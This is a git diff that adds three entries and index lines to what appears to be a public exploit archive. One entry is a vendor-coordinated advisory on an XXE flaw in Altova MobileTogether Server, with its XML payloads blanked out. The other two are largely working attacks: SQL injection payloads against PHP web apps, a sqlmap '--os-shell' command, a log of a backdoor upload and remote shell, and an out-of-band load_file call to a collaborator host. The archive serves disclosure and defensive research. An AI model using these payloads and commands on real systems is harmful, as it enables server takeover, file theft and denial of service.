diff --git a/exploits/multiple/webapps/50191.txt b/exploits/multiple/webapps/50191.txt
new file mode 100644
index 000000000..18d3cd9b4
--- /dev/null
+++ b/exploits/multiple/webapps/50191.txt
@@ -0,0 +1,344 @@
+# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
+# Date: 2021-08-10
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://www.altova.com/mobiletogether-server
+# Version: 7.3
+# CVE: 2021-37425
+
+Advisory: XML External Entity Expansion in MobileTogether Server
+
+RedTeam Pentesting discovered a vulnerability in the MobileTogether
+server which allows users with access to at least one app to read
+arbitrary, non-binary files from the file system and perform server-side
+requests. The vulnerability can also be used to deny availability of the
+system. As an example, this advisory shows the compromise of the
+server's certificate and private key.
+
+
+Details
+=======
+
+Product: MobileTogether Server
+Affected Versions: 7.0-7.3, potentially earlier versions as well
+Fixed Versions: 7.3 SP1
+Vulnerability Type: XML External and Exponential Entity Expansion
+Security Risk: medium
+Vendor URL: https://www.altova.com/mobiletogether-server
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
+Advisory Status: published
+CVE: CVE-2021-37425
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
+
+
+Introduction
+============
+
+"MobileTogether Server is the processing powerhouse for your native iOS,
+Android, Windows, and browser-based apps.
+
+MobileTogether Server is the back-end hub for your solutions and acts as
+a gateway between end-users and your back-end data sources and
+infrastructure."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+MobileTogether Server is a back-end application hosting developed apps
+and provide access to various platforms and devices. Access to these
+apps is possible via native applications for devices and operating
+systems or directly via the browser. To access the MobileTogether
+server, depending on configuration either an anonymous login is possible
+or credentials are required.
+
+During analysis of the communication between a MobileTogether client
+application on a smartphone and the MobileTogether Server, HTTP requests
+were observed containing JSON as well as XML data. Generally, the XML
+data is used to signal changes in the UI or user-supplied input for the
+app hosted in MobileTogether Server.
+
+It was found that user-supplied XML external entities included in the
+described HTTP requests are resolved by the MobileTogether Server and
+the result is reflected in an HTTP response.
+
+This behaviour allows to read local files, perform server-side requests
+and also deny the availability of the service through XML exponential
+entity expansion. However, file disclosure is limited to non-binary
+files and the absolute path needs to be known in advance.
+
+
+Proof of Concept
+================
+
+MobileTogether Server comes with a series of example applications. To
+exploit the vulnerability, access to at least one application is
+required. In the following, the app EuroFXrates and the default user
+root with the default password root is used for demonstration of the
+vulnerability.
+
+The following HTTP request contains the minimal data required to be
+accepted by the server resulting in the processing of the XML data
+stored within the JSON field InfoSetChanges/Changes (formatted for
+better readability):
+
+------------------------------------------------------------------------
+POST /workflowmanagement HTTP/1.1
+Authorization: Basic cm9vdDpyb290
+Content-Type: application/json
+Content-Length: 851
+Host: 192.168.1.1:8085
+Connection: close
+
+{
+ "DeviceY": 0,
+ "ClientVersionName": "7.2.2",
+ "MobileManufacturer": "",
+ "AllInfosetsSerialized": true,
+ "ServerName": "192.168.1.1",
+ "ProtocolVersionMax": "2",
+ "Language": "en-US",
+ "DeviceType": "",
+ "ClientKey": "1_11148009037086584903_2744738433663963458",
+ "DeviceXDPI": 0,
+ "DeviceYDPI": 0,
+ "DeviceYCanvasWithTabs": 0,
+ "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
+ "ProtocolVersionMin": "2",
+ "DeviceXCanvas": 0,
+ "ClientArchiveVersionMin": "-74",
+ "MobileOSVersion": "Android 11",
+ "DeviceXCanvasWithTabs": 0,
+ "ClientArchiveVersionMax": "65",
+ "User": "root",
+ "DeviceX": 0,
+ "DesignFileName": "/public/EuroFXrates",
+ "EncValue": "M9EBc6-7P5cd0",
+ "DeviceYCanvas": 0,
+ "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
+ "InfosetChanges": [
+ {
+ "Changes": [
+ {
+ "": "
+
+ false
+ "
+ }
+ ],
+ "ID": "$$PERS$$"
+ }
+ ],
+ "DeviceIsPortrait": true
+}
+------------------------------------------------------------------------
+
+With the following XML data it can be verified that XML entities are
+resolved and reflected within predefined XML tags in the HTTP response:
+
+------------------------------------------------------------------------
+
+
+]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The HTTP response contains the resolved XML entity:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+
+
+ RedTeam Pentesting
+[...]
+------------------------------------------------------------------------
+
+The following example shows how local files can be read from the server
+system hosting the MobileTogether Server on a Windows system:
+
+------------------------------------------------------------------------
+
+
+]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The content of the file is shown below and formatted for better
+readability:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+
+
+
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1
+
+[...]
+------------------------------------------------------------------------
+
+One interesting target for attackers could be the configuration file for
+the MobileTogether Server residing at the following fixed location:
+
+------------------------------------------------------------------------
+C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
+------------------------------------------------------------------------
+
+For example, if the server supports HTTPS, the absolute path to the
+server's certificate and private key is stored in its configuration.
+
+Furthermore, external XML entities can be used to access third-party
+websites as well as web services that are only available internally.
+Together with an externally hosted XML DTD, response information can be
+extracted:
+
+------------------------------------------------------------------------
+
+
+
+">
+ % dtd; ]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The DTD contains the following information:
+
+------------------------------------------------------------------------
+
+------------------------------------------------------------------------
+
+In the HTTP response, the HTML markup delivered by internal.example.com
+is now visible.
+
+A further vulnerability attacks the availability of the service through
+XML exponential entity expansion. This is demonstrated with the
+following XML document:
+
+------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+]>
+
+ &redteam20;
+
+------------------------------------------------------------------------
+
+Sending the shown XML document leads to a huge server-side resource
+allocation which ultimately disrupts the availability of the
+MobileTogether Server.
+
+
+Workaround
+==========
+
+None known.
+
+
+Fix
+===
+
+According to the vendor, upgrading to version 7.3 SP1 resolves the
+vulnerability.
+
+
+Security Risk
+=============
+
+Attackers in possession of an account for a MobileTogether Server with
+access to at least one app are able to read files from the server
+system, conduct HTTP requests to external and internal systems and can
+also deny the availability of the service. Access might also be possible
+through default credentials or the anonymous user.
+
+
+Timeline
+========
+
+2021-06-21 Vulnerability identified
+2021-06-23 Requested a security contact from vendor
+2021-06-25 Security contact established with vendor
+2021-07-05 Customer approved disclosure to vendor
+2021-07-05 Vendor notified
+2021-07-20 Vendor acknowledged vulnerability
+2021-07-22 CVE ID requested
+2021-07-23 CVE ID assigned
+2021-07-28 Vendor released fixed version
+2021-08-10 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/php/webapps/50190.txt b/exploits/php/webapps/50190.txt
new file mode 100644
index 000000000..c4e0f6754
--- /dev/null
+++ b/exploits/php/webapps/50190.txt
@@ -0,0 +1,45 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
+# Google Dork: intitle: "COVID19 Testing Management System"
+# Date: 09/08/2021
+# Exploit Author: Ashish Upsham
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows
+
+Description:
+
+The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
+SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
+
+==================== 1. SQLi ====================
+
+http://192.168.0.107:80/covid-tms/patient-search-report.php
+
+The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+POST parameter 'searchdata' is vulnerable.
+
+step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
+step 2 : Now copy the post request and save it as test.txt file.
+step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
+
+----------------------------------------------------------------------
+Parameter: searchdata (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 5 columns
+ Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
+
+[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
+[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
+[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
+[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'laptop-ashish\ashish'
+os-shell>
\ No newline at end of file
diff --git a/exploits/php/webapps/50192.txt b/exploits/php/webapps/50192.txt
new file mode 100644
index 000000000..2251943e8
--- /dev/null
+++ b/exploits/php/webapps/50192.txt
@@ -0,0 +1,80 @@
+# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
+# Date: 11-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
+# Version: V1.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /register.php HTTP/1.1
+Host: localhost
+Content-Length: 70
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/register.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
+Connection: close
+
+ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
+
+# Vulnerable Payload:
+# Parameter: ClientId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
+
+--------------------------------------------------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /passwordreset.php HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/passwordreset.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
+Connection: close
+
+loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
+
+# Vulnerable Payload:
+# Parameter: loginId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c0b2caa95..b623ce069 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44319,3 +44319,6 @@ id,file,description,date,author,type,platform,port
50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",2021-08-10,Captain_hook,webapps,php,
50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",2021-08-10,"Aryan Chehreghani",webapps,php,
50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",2021-08-10,"Halit AKAYDIN",webapps,php,
+50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
+50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
+50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,